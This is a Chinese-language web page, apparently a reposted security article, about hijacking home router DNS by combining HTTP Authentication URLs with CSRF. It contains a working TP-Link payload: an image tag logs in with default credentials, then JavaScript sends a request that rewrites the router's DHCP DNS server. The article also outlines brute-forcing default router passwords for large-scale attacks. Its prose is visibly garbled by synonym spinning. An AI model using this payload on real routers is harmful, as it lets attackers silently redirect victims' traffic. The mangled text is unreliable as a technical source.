|
|
|
联系客服020-83701501

利用Http Authentication Url+csrf劫持路由器DNS

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
操作Http Authentication Url+csrf挟制路由器DNS

首先简明的说下什么是Http Authentication,效劳端前去一个401形态,并前去一个WWW-Authenticate头。

WWW-Authenticate头收罗了Http Authentication认证框的一些描叙,以下图

在认证框中输出用户名和密码,将密码放入Authorization头中发送

YWRtaW46YWRtaW4=等于admin:admin的base64编码

Http Authentication这一认证过程,实践上新近在部门浏览器中反对以Http Authentication Url的模式接见会晤登陆,即

http://user:password@url

而微软为了防备垂纶URL的标题问题,出了一个保险补钉,禁止了Http Authentication Url,见

http://support.microsoft.com/kb/834489

科 普竣事,八下过来的一些东西,前些年看到过国内黑路由的几个案例,其中相比逊色的有flash upnp attack,将内网指定IP的端口给映射出来进行打击,诚然还有全副路由有漏洞也也许将路由的WEB办理端口给映射出来进行打击,过后FLASH将这个 保险漏洞修补了。

回到正题上,我们知道国内大全副的家用路由都是操作的Http Authentication认证法子,比方我上图中的便是TPLINK路由,诚然IE禁止了Http Authentication Url,然则firefox、chrome等浏览器任然反对Http Authentication Url,同时以标签的模式嵌入Http Authentication Url也许强制Http Authentication认证凋射,没有任何保险提示,因而险峻的打击方法来了。

1. 我们也许取国内各种路由的默认IP和默认密码结构一个Http Authentication Url暴力登陆脚本。

2.操作CSRF修改路由的DNS,指向我们的恶意DNS。

比方下面这个TPLINK的小DEMO:

Default
12345678 <script>function dns(){alert('I have changed your dns on my domain!')i = new Image;i.src='http://192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=8.8.8.8&dnsserver2=0.0.0.0&Save=%B1%A3+%B4%E6';} </script>

<img src=”http://admin:admin@192.168.1.1/images/logo.jpg” height=1 width=1 onload=dns()>
?接见会晤tplink.html后!

偷偷介入一个8.8.8.8的DNS效劳器!

想想,黑客假定用这种打击法子大范畴打击,将是如何可骇?弹指一挥间,数万路由被悄悄修改DNS?

这是一个普及的保险标题问题,您的路由器是否修改好了默认密码,不过值得光彩的是只有firefox、chrome等浏览用具有此类保险标题问题。

link:http://hi.baidu.com/kpstfbahmmalqre/item/008121262c7802112b0f1c89

本文由网络保险攻防研究室(www.91ri.org)静态保险小组收集整理。

数安新闻+更多

证书相关+更多